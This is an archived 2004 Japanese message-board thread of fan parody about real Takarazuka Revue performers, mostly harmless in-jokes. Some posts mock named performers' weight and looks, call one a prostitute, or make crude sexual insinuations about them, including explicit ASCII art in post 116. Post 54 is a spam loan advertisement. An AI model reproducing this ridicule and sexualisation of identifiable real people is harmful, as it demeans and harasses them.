5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

(;´д`)「こんな○○は嫌だ」@宝塚 第九幕

1 :和央ようか@「BOXMAN」公演中なのにスレ立て:04/03/10 21:55 ID:G2L6VKM/
       / ̄ ̄ ̄
 冫、 < こんなの嫌だなあと思うことを書き込むスレでしてよ。
 `      わたくし達が退団する日までおよろしくね。
      \___

前スレはこちら。
第一幕 http://hobby2.2ch.net/siki/kako/1042/10423/1042306864.html
第二幕 http://hobby2.2ch.net/test/read.cgi/siki/1045661600/
第三幕 http://hobby2.2ch.net/test/read.cgi/siki/1049377276/
第四幕 http://hobby2.2ch.net/test/read.cgi/siki/1055477934/
第五幕 http://hobby2.2ch.net/test/read.cgi/siki/1059813097/
第六幕 http://hobby2.2ch.net/test/read.cgi/siki/1064046936/
第七幕 http://hobby2.2ch.net/test/read.cgi/siki/1066602305/
第八幕 http://hobby2.2ch.net/test/read.cgi/siki/1071486414/

2 :和央ようか@「BOXMAN」公演中なのにスレ立て:04/03/10 21:55 ID:G2L6VKM/
宝塚「おとめ」宙組 ● 花總 まり
@2月28日 A東京都 B日本女子大学附属高校 C162cm(+2cm)
D1991年3月ベルばら E今まで頂いた(たかこさんの相手)役全部
F今までたかこさんが演じた役の相手役全部と、今までワタクシが演じた
役全部をもう1度。そして今まで頂いていない役総てに挑戦したいです。
Gボーッと2ちゃんを見ることと、たかこさんにまりたん賛美のカキコを
してもらうこと。H世界中のお姫様のドレス IHANACHANG J黒、白 
K豚のしょうが焼き Lブリッコ、初心に戻ること M家族で考えました 
Nハナ、まりたん、女帝

3 :名無しさん@花束いっぱい。:04/03/10 22:01 ID:vju2pXmH
3(σ´Д`)σゲッツ!!
1タン、乙華麗!

4 :名無しさん@花束いっぱい。:04/03/11 18:34 ID:BIo0mjFE
前スレが埋まるまでこのスレが落ちないように保守している和央ようか。

5 :名無しさん@花束いっぱい。:04/03/11 23:38 ID:p2a+HoNO
前スレが埋まり、休む間もなくこのスレにきた和央ようか。


6 :名無しさん@花束いっぱい。:04/03/11 23:41 ID:HAJp1/hf
タカコさんのそんな苦労なぞ露知らず、何とかの一つ覚えのように相変わらず
"ぶっさんぶっさんぶっさん"と書き続けてるタニ@誰かとめてやれ

7 :名無しさん@花束いっぱい。:04/03/11 23:44 ID:pmx1KQr6
私、ごく控えめに次々作品は、クレオパトラ、楊貴妃、
エリザベス女王一世、二世、イスカンダルのスターシャを
輪廻転生する役をしてみたいですわ、小池先生。とのたまうマリたん@いつも謙虚

8 :名無しさん@花束いっぱい。 :04/03/11 23:57 ID:ICti032T
「ぶっさんボケてきたんでつかねえ」@悪気は全くないタニ

9 :名無しさん@花束いっぱい。:04/03/12 00:03 ID:+8j/eD+f
それじゃ1人の女性が生まれ変わる話なんてどうかな?
古代イングランドのお姫様→オーストリア皇妃→ラスベガスの歌姫
で1本物が出来るよ、とコイケっち@エクスカリバー→エリザ→カスミラ
自作パクリまっしぐら

10 :名無しさん@花束いっぱい。:04/03/12 00:09 ID:vqJW/mq6
「こいけせんせいもぼけてきたんでつかー?」まったくまったく悪気はないタニ

11 :名無しさん@花束いっぱい。:04/03/12 00:17 ID:YW+TGKGM
2004/03/12
宙組退団者のお知らせ

下記の生徒の退団発表がありましたのでお知らせいたします。

 宙組 大和悠河    
   
      2004年3月12日(星組宝塚大劇場公演)付で退団

おイタが過ぎて勝手に退団を発表されるタニ@どーしてでつかー

12 :名無しさん@花束いっぱい。:04/03/12 00:28 ID:HB8u2Ezj
よく見ると「大」に小さい点がついていて犬和悠河になってるのをみて
字が違ってまつよーと、お仕置きのどっきりだと気が付かないタニ@状況がわかってない


13 :名無しさん@花束いっぱい。:04/03/12 00:37 ID:l6EAyyrF
そういえば、まりは色々な役をしてきたね。
娘1になって何年目だっけ?とこいけっちに聞かれ、
「とうねん取って、1年目ですわ」
と答えるまりたん。

14 :名無しさん@花束いっぱい。:04/03/12 00:50 ID:oFla87UL
タニに漢字の違いが分かるなんて!と感動したが、自分の名前くらい
分かって当然よね…とチョト落ち込むミズ@タニ専属の漢字の先生

15 :名無しさん@花束いっぱい。:04/03/12 03:06 ID:HB8u2Ezj
とうねんって今年ってイミの当年じゃなくて、十年ってことなんでつねっ!と
ものすごくいい事に気が付いたような気がするタニ@妙な知恵ばかり付く

16 :名無しさん@花束いっぱい。:04/03/12 17:23 ID:a900ZnMl
>15
え、そうだったんですか?
全然しりませんでした@まりたん

17 :名無しさん@花束いっぱい。:04/03/12 18:05 ID:dJMozk+w
「とうねんネタをいつまでも引っ張るんじゃね〜よ」
と毒づくアリス@前スレ977の決意をもう忘れた
「文句言う前に自分でネタ振ってね」
と優しく注意するタカコ@もう自分が何者なのかも・・・


18 :名無しさん@花束いっぱい。:04/03/12 21:16 ID:cZBDNwQ9
かなみんのデブねたから、
アリスの性悪ネタにすっかり変ってしまったこのスレを、
「あの宙組の、みな心一つのまとまりは、どこへ行ってしまったの」
と嘆くマリたん@全体主義

19 :名無しさん@花束いっぱい。:04/03/12 21:23 ID:oFla87UL
ぶっさん!自分が棚の上にあがってまつ!とタニ@速やかに降ろすべし

20 :haru:04/03/12 21:24 ID:EQseGHN5
 だれだ!谷ちゃんをたたくのは!

21 :名無しさん@花束いっぱい。:04/03/12 21:53 ID:XG3OC4p3
ぶっさん・・・と自分で考えましたクロスワードパズル@まさちゃん

22 :名無しさん@花束いっぱい。:04/03/12 22:08 ID:UwxrpaPL
まやさんを探す十輝いりす@「ヨコのカギ・・・ タ○○○○○イ」 がわかりません

23 :名無しさん@花束いっぱい:04/03/12 22:12 ID:ONCOy9Vd
「タカハナスゴイ」ですわよね、けして「タカハナキモイ」ではない
ですわよね、と目を光らせながら訊ねるまりたん@糸目破動&
高音超音波発射準備開始

24 :名無しさん@花束いっぱい。:04/03/12 22:14 ID:nPFYhvPv
タカコヤメタイでつよ!とぶっさんに教えるタニ

25 :名無しさん@花束いっぱい。:04/03/12 22:20 ID:UwxrpaPL
タニに向けられた糸目破動&高音超音波を運悪く浴びてしまう十輝いりす

26 :名無しさん@花束いっぱい:04/03/12 22:20 ID:ONCOy9Vd
そんなはずはありませんわ。たかこさんの心は私が一番良く分かっています
もの。でもたかこさんがもしそうしたいといったら受け止めますわ!!
と自信満々に言うまりたん@そんな意味ではないよね・・・

27 :名無しさん@花束いっぱい。:04/03/13 01:04 ID:TSvZdDG8
ハナに見つからないようにいりすを背負う七帆ひかる@貧乏クジ引きまくり

28 :名無しさん@花束いっぱい。:04/03/13 14:10 ID:7VKelMRK
前スレをまとめて読もうと思ったら、既に落ちていて鬱が進行する遼河はるひ
@過去ログの読み方を知らない

29 :名無しさん@花束いっぱい。:04/03/13 16:35 ID:giCKB0cL
あひ君、僕がやり方を教えてあげるでつ!!@これでも
あひより1こ上級生&2チャンなれしてるタニ。

30 :名無しさん@花束いっぱい。:04/03/13 21:20 ID:Wlizcklf
今頃、かなみはどこで何をしているやら、と腰をいたわるミズ

31 :名無しさん@花束いっぱい。:04/03/13 21:32 ID:8OwJueOa
「世界一周グルメツアーをしているので捜さないでください」かなみ

32 :名無しさん@花束いっぱい。:04/03/13 22:00 ID:VU7yMKCc
実は名前を変えて「元祖でぶや」に出演していただけだったかなみん

33 :名無しさん@花束いっぱい。:04/03/13 22:52 ID:3Q9h1WMN
タニの大ボケ、アリスの性悪に取って代わられつつあったこのスレに、
かなみのでぶネタ復活を祝うタキ組長@これで私の体型もも目立たずに済む

34 :名無しさん@花束いっぱい。:04/03/13 23:32 ID:NhZs4dAH
二人で充分めだっとるんじゃボケェ!とアリス@逆の意味で体型目立ってます

35 :名無しさん@花束いっぱい。:04/03/14 00:41 ID:TgNVH4Oh
かなみとアリスの体重を足して2で割ってみるミズ

36 :名無しさん@花束いっぱい。 :04/03/14 00:48 ID:R0yyYWFj
↑難しくて何のことかさっぱりわからないタニ

37 :名無しさん@花束いっぱい。:04/03/14 01:52 ID:D/Ty+2hX
写真を切り抜きかなみの顔にアリスの体をくっつけてみるミズ
@「サザエさんでつかー?」喜ぶタニ。

38 :名無しさん@花束いっぱい。 :04/03/14 12:48 ID:chkK1S8+
↑自分のやってることが虚しくなったミズ@所詮叶わぬ夢よね・・・

39 :名無しさん@花束いっぱい。:04/03/14 13:56 ID:TgNVH4Oh
まりたんの顔にアリスの体をくっつけるタニ

40 :名無しさん@花束いっぱい。:04/03/14 14:37 ID:swOEBmG/
アリスの顔に、まりたんの体をくっつけるタカコ

41 :名無しさん@花束いっぱい。:04/03/14 14:50 ID:E7lgr98/
40だったら完璧!!なのに・・・・とタカコ

42 :名無しさん@花束いっぱい。 :04/03/14 15:03 ID:1qR0Eesj
タカコさん、何かおっしゃいまして?とマリタン@壁に耳あり障子に目あり

43 :名無しさん@花束いっぱい。:04/03/14 15:42 ID:swOEBmG/
顔に糸あり目尻に松葉

44 :名無しさん@花束いっぱい。:04/03/14 15:46 ID:Abdfaeea
自分の写真とタカコの写真を切り抜いて、中表にして
重ね合わせてみるまりたん@一生離しませんわ。

45 :名無しさん@花束いっぱい。:04/03/14 17:19 ID:3oyqijQf
タカコの顔とハナちゃんの体@メルトゥイユ侯爵夫人を
くっつけたことがあったわね?と微笑む高嶺ふぶき
私とのツーショットはやめて欲しかったわ。

46 :名無しさん@花束いっぱい。:04/03/14 21:19 ID:SboqnkkH
けっ、これで彩音にも負けないぜ!
芝居も最後まで出てみせるby40@新生アリス、性格は変らず

47 :名無しさん@花束いっぱい。:04/03/14 21:39 ID:lru9NVRg
タカコと自分の顔を合成して「二人の子供が生まれたら・・・」
なんて甘い夢をみてみるマリタン

48 :名無しさん@花束いっぱい。:04/03/15 13:19 ID:86kLuIF4
「キモッ」と無意識につぶやいてしまった水@私としたことが・・

49 :名無しさん@花束いっぱい。:04/03/15 14:50 ID:GaqlmezE
実は「キモキモキモキモ」と水の後ろで囁き続けていたアリス@洗脳してやる・・。

50 :名無しさん@花束いっぱい。:04/03/15 17:42 ID:Ix5gHq/J
アリス、いい加減にしなさい。あなたは、人の迷惑を考えないの!?@まりたん

51 :名無しさん@花束いっぱい。:04/03/15 19:01 ID:lEir+DIL
「タテのカギ… 宝塚歌劇団の可憐な娘役 ○○○○○○○」がわかりません@十輝いりすタン

52 :名無しさん@花束いっぱい。:04/03/16 00:11 ID:7C5rW1vV
そういう時は「たかやぎみどり」って入れておくんだよ@宙組の忠実なしもべ七帆ひかる


53 :名無しさん@花束いっぱい。:04/03/16 09:42 ID:edu9mBzn
「可小米
   タキ」ってなんでつか?にんげんじゃないってことでつか?@タニ

54 :名無しさん@花束いっぱい。:04/03/16 09:58 ID:KLoC4THQ
■□■□■□■□■□■□■□■□■□■□■□■
親切・丁寧をいつも心掛けているキャッシング・サービス

ご融資・お支払い担当は女性STAFFですので、気軽に
何でもご相談ください。他社で断られてしまった方・失業中
の方・アルバイトの方も希望額ご融資出来るよう努力します。

金利は法定金利内・支払いは月1回利息だけで大丈夫です。
http://2314.fem.jp/
■□■□■□■□■□■□■□■□■□■□■□■


55 :名無しさん@花束いっぱい:04/03/16 12:53 ID:HENu83ci
さえこマンセーと言い続ける上だの顔を嬉しそうに見つめるさえこ。次は僕の番でつか
?と横やりを入れるタニ

56 :名無しさん@花束いっぱい。:04/03/16 15:06 ID:BHXWVbe/
そんなタニを抱えて猛ダッシュする水@いくらなんでも・・もう腰が限界・・

57 :名無しさん@花束いっぱい。:04/03/16 22:45 ID:9uV3du43
腰の限界を感じ、抱えたタニを悠未ひろにパスする水@とたんにばったり

58 :名無しさん@花束いっぱい。:04/03/16 22:49 ID:xyxWtFpt
ついタニを小脇に抱えてオフサイドしてしまった悠未ひろ@ラガーメェン?

59 :名無しさん@花束いっぱい。 :04/03/16 22:55 ID:5I4kaqlX
倒れたまま誰にも助けてもらえないミズ@だ、だれかぁ〜・・・

60 :名無しさん@花束いっぱい。:04/03/16 23:00 ID:edu9mBzn
ミズの声を聞きつけて助けに来て、ふんずけてしまったミホコ@あらぁ〜

61 :名無しさん@花束いっぱい。:04/03/16 23:24 ID:b0vloeT+
ミズに、
「大丈夫ですか?」
と訊ねるみほこ。そのみほこに、
「体重オーバーですか?」
と訊ねるアリス@嫌味は人一倍

62 :名無しさん@花束いっぱい。:04/03/17 00:14 ID:mXVNoi8R
倒れているミズを
ハイヒールで踏み付けるまりたん@ご満悦


63 :名無しさん@花束いっぱい。:04/03/17 00:27 ID:a7OJlqvF
>62
私は未来の旦那様を踏みつけたりしませんことよ
とまりたん@まだまだ居座る

64 :名無しさん@花束いっぱい。:04/03/17 00:33 ID:LZfBFrj4
すると私は解放されるのね、ついに
と退団届けを準備する和央ようか@なみだ目

65 :名無しさん@花束いっぱい。 :04/03/17 00:46 ID:HVVuOj1F
そんなことより早く助けて・・・@ミズ もうだめぽ・・・

66 :名無しさん@花束いっぱい。:04/03/17 01:28 ID:97raCa3w
大丈夫ですか?やっぱりお腹空いてるんですか?!
と倒れているミズを起こそうともしないでポテトチップスを
差し出すカナミ@大切な人にはお菓子をわけなきゃねv

67 :名無しさん@花束いっぱい。:04/03/17 08:06 ID:dxpOIaMY
やっぱり食べられませんか。では。とポテチをががーっと自分の口に
流し込み、ばりばりかみくだきながらミズを背負って退場するかなみん。
ついでにリフトの練習もしてみるかなみん。失神するミズ…

68 :名無しさん@花束いっぱい。:04/03/17 10:30 ID:HfsXvqCk
そんなミズカナコンビの関係が時々羨ましかったりするタカコ@口には出せない

69 :名無しさん@花束いっぱい。:04/03/17 12:07 ID:BjGramnW
やはりかなみは体重があって凄いですわね。とのたまう出雲組長

70 :名無しさん@花束いっぱい。:04/03/17 13:39 ID:Jlmyt4kl
たかこの顔に糞尿を投げつける花總@ブサイクは嫌いですわ

71 :名無しさん@花束いっぱい。:04/03/17 15:21 ID:dxpOIaMY
70は偽者のうえにお下品ですわ。と糸目ビームで黒焦げに焼きまくるまりたん。
ぶすぶすと煙をたててくすぶる70。

72 :名無しさん@花束いっぱい。:04/03/17 16:13 ID:YAGokAC4
キャハハハハハ(爆笑っ)))

73 :名無しさん@花束いっぱい。:04/03/17 16:49 ID:7RCnpztc
「昭和天皇の在位は64年・・・わたくしなどまだまだですわ」
とつぶやいてみるまりたん@目標は高い

74 :名無しさん@花束いっぱい:04/03/17 17:36 ID:K1Jzpi0d
色々な男を相手にできる売春婦@目標だけは高い

75 :名無しさん@花束いっぱい。:04/03/17 21:13 ID:fbE0fraw
「74タン、スミレコードひっかかりまつよー」とタニ@まだフィールドに転がっていた

76 :名無しさん@花束いっぱい。:04/03/17 22:05 ID:mXVNoi8R
異常なアンチが付いてはじめて一人前の娘役ですわ!
とまりたん@無敵と書いてハナフサと読む

77 :名無しさん@花束いっぱい。:04/03/17 22:21 ID:PTgB9a9/
花總と書いてチョウキセイケンと読む

78 :名無しさん@花束いっぱい。:04/03/17 22:47 ID:Pr09/mu+
そういえば、ルイ14世の治世はもっと長かったのですわね、とまりたん@まあ72年なんて!まだまだですわ。
公演中いきなり背筋が寒くなるきりやん@ただいまルイ14世憑依中

79 :名無しさん@花束いっぱい。:04/03/18 03:04 ID:UtkuhyyB
もーミズさん重いですぅ!とミズを容赦なく地面に叩きつけるカナミ。
痛みで目を覚ますミズ@もう相手役なんてあの人だって誰だっていい・・
腰さえ守れれば。

80 :名無しさん@花束いっぱい。:04/03/18 13:06 ID:Giubu59J
ミズしゃーん、大丈夫でつか〜?!@タニ登場。
ますます気分の悪くなるミズ。

81 :名無しさん@花束いっぱい。:04/03/18 15:54 ID:DNKzQ3mn
79のミホコは偽者じゃないかな。
ミホコにとってミズさんが重いわけないもの。
と思ったが口には出せなかったあひ@まだ鬱

82 :名無しさん@花束いっぱい。:04/03/18 17:27 ID:QnLYSiqL
心配になっちゃうすっしー@みんな元気出して?

83 :名無しさん@花束いっぱい:04/03/18 18:09 ID:Q9ZOuTXJ
「74タン、宙組と関係ない話は止めてくださいー」とタニ@渋谷まで30分




84 :名無しさん@花束いっぱい:04/03/18 19:40 ID:U7n0qtku
さえこのトップお披露目ポスターが何故か植田とのツーーショット
嫉妬に燃える目でにらめつける谷。わたしじゃ駄目?と袖をひっぱる
さえこの妹@その光景を鼻でせせら笑う柴田



85 :名無しさん@花束いっぱい。:04/03/19 02:51 ID:f2vvtQrB
飢えだ、柴田ときたら、私の出番だ@おかだ

86 :名無しさん@花束いっぱい。:04/03/19 10:46 ID:rvXcTatQ
そんな騒ぎに紛れて月のポスターを自分のドアップ写真にすり替えるまりたん

87 :名無しさん@花束いっぱい。:04/03/19 13:07 ID:hKiOeTT3
月の全ツ空席一杯ありますよとのんきに話すタニ。そんなことより
星の不入り心配してくれよと不機嫌なわたる。どこの組も不入りには
頭が痛いですねと溜息をつくコム。@私たちがトップになったらそんな
こと全然心配ないわと鼻息の荒い水、あさこ、とうこ。ほんとうに
そうだろうかと疑心暗鬼のファン。


88 :名無しさん@花束いっぱい:04/03/19 16:47 ID:0lkDh1Qi
私たちの愛の世界に不入りなんて関係ありませんわとまりたん。
 
「私たちって・・・?」わざとぼけてみるたかこ。

「お前以外誰がいる!!」
即効つっこむ関西人・樹里@そりゃ次はまりたんと組むかもしれないけど
   同じく関西人・とうこ@そりゃ次はまりたんの恋人役だけど・・   


89 :名無しさん@花束いっぱい。:04/03/19 20:26 ID:ege0ztLQ
私には不入りが関係ありますよ、とマグロ。
マグロも官能の世界。浜辺に打ち上げられたまぐろ@鮮度も落ちて冷凍

90 :名無しさん@花束いっぱい。:04/03/19 20:53 ID:X3Rkt3P2
ゴールデンコンビなんていわれてるけど別にタカちゃんのこと
好きじゃないわ。ただ私を一番目立たせてくれる稀有な人なの。私の影なの。
たかこ 何でもいいっす。名前だけトップってついてれば。
@俺をいつまで待たせるんだ.あごがこんなに長くなっちゃったよ。水

91 :名無しさん@花束いっぱい。:04/03/19 20:59 ID:hN+YlmR2
ミズたんのあごは日々成長しているんでつか!!では観察日記をつけるでつ!
目を輝かせてノートと鉛筆、定規を準備するタニ

92 :名無しさん@花束いっぱい。:04/03/19 21:08 ID:6hrPqV2z
毎日微妙に伸びていることを実証したタニ

93 :名無しさん@花束いっぱい。:04/03/19 21:10 ID:aTELAoyt
そんなタニのあごを測ろうとするあひ@まだ鬱

94 :名無しさん@花束いっぱい。:04/03/19 22:05 ID:PHVg3n4+
そしてついでに自分のあごも測ってみたら、
マイあごが1番長かったのがちょっと嬉しかったあひ
@水さんタニさんに勝っちゃった♪・・・鬱脱出か?

95 :名無しさん@花束いっぱい。:04/03/19 22:37 ID:ZUEtNiYE
観察日記にとうとう色鉛筆が登場@タニ画伯

96 :名無しさん@花束いっぱい:04/03/19 22:43 ID:mjuHvJM2
オレの芸術は「破壊」だーー!!@タニモディリアーニ画伯

気づけば観察日記のミズ、あごが1メートルに!?

97 :名無しさん@花束いっぱい。:04/03/19 23:23 ID:Mt33/loF
韓国公演が来年あるかもという話がでて
まだ話が全然決まってないのに
さっそく自分がトップで行く準備をするプリンセスまりたん

98 :名無しさん@花束いっぱい。 :04/03/19 23:26 ID:HF9mqFx6
プリンスたかこを早くもカバンに詰めるまりたん

99 :名無しさん@花束いっぱい。:04/03/19 23:26 ID:/hn+Ub7b
いそいそとハングルを覚えるまりたん@先生は草薙剛

100 :名無しさん@花束いっぱい。:04/03/19 23:28 ID:uf7qt3Dl
その間もやはりどんどんあごが伸びていくミズ・・・
たにの日記も2冊目に突入

101 :名無しさん@花束いっぱい。:04/03/19 23:30 ID:ZUEtNiYE
>>99タン、草なぎ君の’なぎ’の漢字が違いまつよ。パソコンの標準文字じゃあ
ないんでつ。と冷静にツッこむタニ。タニに勉強の成果か!?もしくは神降臨か!?
@心拍数が異常に上がってるミズさん

102 :名無しさん@花束いっぱい。:04/03/20 00:29 ID:7s5EnhVs
>>97
いっそ韓国に住み着いてみたら・・と考えてしまった宙組子

103 :名無しさん@花束いっぱい。:04/03/20 08:22 ID:CtuuUsLp
タニの「水さん観察日記」が大劇場にはりだされ、
1メートルあごの自分の絵を見て心拍数が頂点に達したミズ@だ誰か救急車;

104 :名無しさん@花束いっぱい。:04/03/20 15:03 ID:Wv1+Viy6
わたしの贔屓はどうしてトップになれないんだ〜と叫ぶ○○ファン
わしに一声かけてくれれえばいいんじゃよ。まあ好みはあるがと鼻の下をのばす植田
@えっ?学会に入らなくてもトップになれるの?すっかりネットに汚染された馬鹿ども

105 :名無しさん@花束いっぱい。:04/03/20 15:10 ID:4KLOpSCG
age

106 :名無しさん@花束いっぱい。:04/03/20 18:57 ID:fpu3x4yZ
スレ違いの書き込みが続いていてよ。
ここは宙組スレでしてよ@宝塚のお長夫人

107 :名無しさん@花束いっぱい。:04/03/20 20:03 ID:PtnHBs4Y
蝶でなく「長」ってことは長くいるって意味かな・・・
と考えるタカコ

108 :名無しさん@花束いっぱい。:04/03/20 22:14 ID:/UremJgg
受け口だ、品がない、知性がない、ポリシーがないのはわしの
責任じゃない。みんなDNAのせいだとうえだ
@私に芸がない、人気がない、不潔感があるのもみんなあのひとのせいよとさえこ


109 :名無しさん@花束いっぱい。:04/03/20 22:17 ID:NQPGMavn
お腸夫人って飲み物がほんとにあるんでつよ!と無邪気にタニ@それを飲む前に
胃のあたりを押さえるタカコさん


110 :名無しさん@花束いっぱい。:04/03/20 22:51 ID:dk6F/17H
タカコさん、大丈夫ですか?
あと3年は一緒に頑張ってもらわなければ@お長夫人

111 :名無しさん@花束いっぱい。:04/03/21 00:06 ID:nsrTK2cr
いかりや長介さんの喪に服するために休演

112 :名無しさん@花束いっぱい。:04/03/21 01:24 ID:wA7aszWC
ご冥福をお祈りして合唱するミズとタニ@合掌違い

113 :名無しさん@花束いっぱい。:04/03/21 01:27 ID:tj3f1CAp
そこにわたるさんだんさんさえこさんが加わり、OGからはマリコさんが
加わる@耳栓必須メンバー

114 :名無しさん@花束いっぱい。:04/03/21 07:45 ID:Gi+7vqOB
アメージンググレースを合唱する一同@身の程知らず

115 :名無しさん@花束いっぱい。:04/03/21 09:29 ID:hfD6dpVm
タカコさん、なによりも健康に気を付けていつまでも二人で舞台を務めましょうね^^
組子の皆さん、いかりやさんは亡くなったけど、私はこんなに元気です!@お長夫人

116 :名無しさん@花束いっぱい。:04/03/21 10:05 ID:Az2f4nPM
     人
    / 0.ヽ
    // ハヽヽ    / ̄ ̄ ̄ ̄ ̄
   (( / ヽ)) < ファントムでクリトリス役を演じるマリタンでーす。
    ヽヽ//    \_____
     ヽ/

       ⌒`'〜
     ノ    ⌒ヽ   ⌒ヽ))
     ;,ノ ノノ'ヘヽ)  (((~⌒彡
      ゝ・ _ ・ノ_   /冫、 (((  <ハナのクリトリスは最高に綺麗
    _|^\ イ_|ー‐ヽ`  ノノノ
   rイ  |ノ~ヽ| '||  リ)_(((   <誰のと比べてるのかしら、クスッ
  | ヽ 總 || | |總(/゜゜゜ r⌒ノンヽ
   | | § ||ノ/§ ノY⌒'~ヽ〜ノン
  | | §__|__§〈總/  /||
  |  ゝ_ ,っ"   ハy  〈ミ)||
  ゝ 〃  } ミ) (C⊂{ll:ニニノ

117 :名無しさん@花束いっぱい。:04/03/21 12:07 ID:xao420b4
春休みなんだねぇ・・



118 :名無しさん@花束いっぱい。:04/03/21 14:17 ID:tJ91Ms1T
博多どんたくへと流れる人の波、波、波。どんたくなんて無く
なればいいのにと悔しがるさえこ@ドンたくなんて無くてもさえこなんて観に
行かないよと冷ややかなファンの目、目、目。
どんたくってそんなにおもしろいの?と明るく問いかけるタニ。



119 :名無しさん@花束いっぱい。:04/03/21 15:11 ID:gehbXT9v
>>117
本当にねぇ…
いかりやさんのことはネタとしちゃいかんだろ。

120 :名無しさん@花束いっぱい。:04/03/21 21:46 ID:DZDR01Bg
ネットで熟語や四文字熟語を間違って使う人って遠くからきたひと?とまたまた
問題発言をしてトップの座が遠のくあすか@だから私は黙って花ちゃんに寄り添って
るのよと不敵に笑うたかこ。顔に疲労の色が漂う。なので次の公演は仮面をつけます

121 :名無しさん@花束いっぱい。:04/03/21 22:40 ID:nsrTK2cr
ファントムと聞いて、航空自衛隊からファントム戦闘機を借りてくるはなちゃん。

122 :名無しさん@花束いっぱい。:04/03/21 22:56 ID:bktLiPbn
ファントムの仮面は顔にケロイドができてるみたい。
たかこさんにはとてもお似合いね。
でもわたくし、もうたかこさんには飽きましたの。
和央退団署名でもしようかしら?@ブサイク嫌いなはなちゃん。

123 :名無しさん@花束いっぱい。:04/03/21 23:47 ID:dlZOwPh/
>121

次回作は、戦争ものなんでつか?
戦闘機には、僕は詳しいでつ@タニ

124 :名無しさん@花束いっぱい。:04/03/22 07:20 ID:ZIQoSDNi
まりたんが借りてきたファントムに乗り込み操縦しようとするタニ@かこいいでつ〜

125 :名無しさん@花束いっぱい。:04/03/22 08:49 ID:bKdwfqPA
けっ、ファントム戦闘機はもう旧式なんだぜい。
宙組はタカラヅカで一番新しくできた組なんだから、
新型が本来似合う組なのに@アリス

126 :名無しさん@花束いっぱい。:04/03/22 21:20 ID:TnmRzYlA
けれど私は、他の方々と違い、何でも似合うのよ@マリタン

127 :名無しさん@花束いっぱい。:04/03/22 22:15 ID:I3j0DGZh
90週年式典での「花總賛歌」が時間の都合上3番までとなったと連絡が入って
不機嫌になり、和央に連夜の夜伽を命じるまりたん。

128 :名無しさん@花束いっぱい。:04/03/22 22:18 ID:ZIQoSDNi
「宙組は本来、新型が似合うのに」と夜ごとまりたんの枕元でささやくアリス@

129 :名無しさん@花束いっぱい。:04/03/22 22:40 ID:kin8Fs/x
そんなアリスのささやきも
子守唄にしか聞こえないまりたん@爆睡中

130 :名無しさん@花束いっぱい。 :04/03/22 23:23 ID:l2zVeccV
僕が代わりに子守唄歌いまつ〜@ごきげんタニ

131 :名無しさん@花束いっぱい。:04/03/23 00:23 ID:1S2ftkaE
夜伽を命ずる@まりたん

132 :名無しさん@花束いっぱい。:04/03/23 00:54 ID:0hGleW9u
ファントムは操縦席が前でナビが後ろ… 二人乗りなんだよね
でもってイーグルは一人乗り… さーてどっちに乗ろうかな♪
ステルスも捨てがたいのよね、とブツブツ言ってるタカコさん@背中には
ファントムにするのです!とまりたん糸目ビームがチクチク


133 :名無しさん@花束いっぱい。:04/03/23 07:39 ID:wnxRBzJG
まりたん&(和央ようか)の舞台を見ながら、ついここにカキコする
ネタを考えて舞台に集中できない宙ファソ。

134 :名無しさん@花束いっぱい。:04/03/23 13:47 ID:zv6vaRao
F−15イーグルは単座だけど、
F−15Eストライク・イーグルは、
操縦席が前で兵装システム士官用座席が後ろ・・・二人乗りですよ

と、妙に詳しい兵器オタクのタニ

135 :名無しさん@花束いっぱい。:04/03/23 15:43 ID:wnxRBzJG
夜伽ばかりさせられている和央ようか@疲れてぼんやり。

136 :名無しさん@花束いっぱい。:04/03/23 16:52 ID:L99T4vp4
夜伽ばかりさせているマリたん@余韻でうっとり

137 :名無しさん@花束いっぱい。:04/03/23 21:35 ID:kkUmhgGI
「夜伽」って何て読むのでつか〜と水に聞くタニ。

138 :名無しさん@花束いっぱい。:04/03/23 21:42 ID:WI9ZIAGg
ヨイカだよ。今日は稼ぐぜ!@アリス

139 :名無しさん@花束いっぱい。:04/03/23 22:09 ID:EGcBhjP3
ヨイカのあとはなんであんなにたかこさん疲れてるんでつか〜と
さらにミズに質問するタニ

でもまりたんはお肌つやつやに・・・(汗)

140 :名無しさん@花束いっぱい。:04/03/23 22:14 ID:3QhcvsNl
ふーーッとため息つきながら「私は↑こんな風にならないわ」と
ストレッチしながら彩音にメールするアリス。

141 :名無しさん@花束いっぱい。 :04/03/23 22:39 ID:H2IvpRAj
次期スカイフェアリーズを狙ってるまりたん@まだまだ下級生ですもの

142 :名無しさん@花束いっぱい。:04/03/23 23:19 ID:RI7ZyH6i
うなだれるスカステスタッフ@ライト増やさなきゃ・・・

143 :名無しさん@花束いっぱい。:04/03/24 00:18 ID:IbXXkviT
駆り出されるテデジタル処理班@修正しなくちゃ・・・

144 :名無しさん@花束いっぱい。:04/03/24 12:18 ID:q6uGQAU2
修正??そんなものワタクシには必要なくってよ!と、つぶやくマリタン@化粧で修正してますわ。

145 :名無しさん@花束いっぱい。:04/03/24 12:34 ID:H+bHYVbc
膨大な数のシワを画像処理で消すのと精巧な「CGまりたん」を作るのと
どちらが結果的に楽なのかを話し合うスカステスタッフ

146 :名無しさん@花束いっぱい。:04/03/24 15:57 ID:KMT+STtm
月の次期トップはあさこで決定ねと浮き足だつあさこファン。
まだわたしのお披露目もすんでないのにと怒りもあらわなさえこ@僕の時もさえこさん
のようになるのでつか?と不要な心配をするタニ。タニさんといえば汗っかきですね
と意味不明な突っ込みをするえみくら。


147 :名無しさん@花束いっぱい。:04/03/24 16:25 ID:clV6OfD2
りか退団と同時にさえこトップを発表したときより酷いやりかたねと
にんまりほくそえむさえこアンチ。@まだまださえこには愛があるよと
にやけるうえだ。

148 :名無しさん@花束いっぱい。:04/03/24 17:26 ID:9XEwMKil
春なのでスレ違いも仕方ありませんわねマリたん
@わたくしの初々しいOL姿を見に大阪へいらしてね

149 :名無しさん@花束いっぱい。:04/03/24 18:30 ID:8hBWVX9V
>@わたくしの初々しいOL姿を見に大阪へいらしてね

いいえ、OL姿だけではありませんわ。

いつ、どこで、誰が、誰と、何を、どうしようとも、
花總まりは、宝塚の女王なのですから!

150 :名無しさん@花束いっぱい。:04/03/24 19:31 ID:h+mynt+R
>148
あなたはアホですか?スレのどこに宙専用ってかいてあるのかな?

151 :名無しさん@花束いっぱい。:04/03/24 21:12 ID:XH1CWBKZ
「私の辞書に、宙専用と書いてありますわ」
と150の質問に答えるまりたん。
全員うなずく、と書いたカンペをすかさず出す和央ようか。

152 :名無しさん@花束いっぱい。:04/03/24 21:18 ID:EjxpeYmx
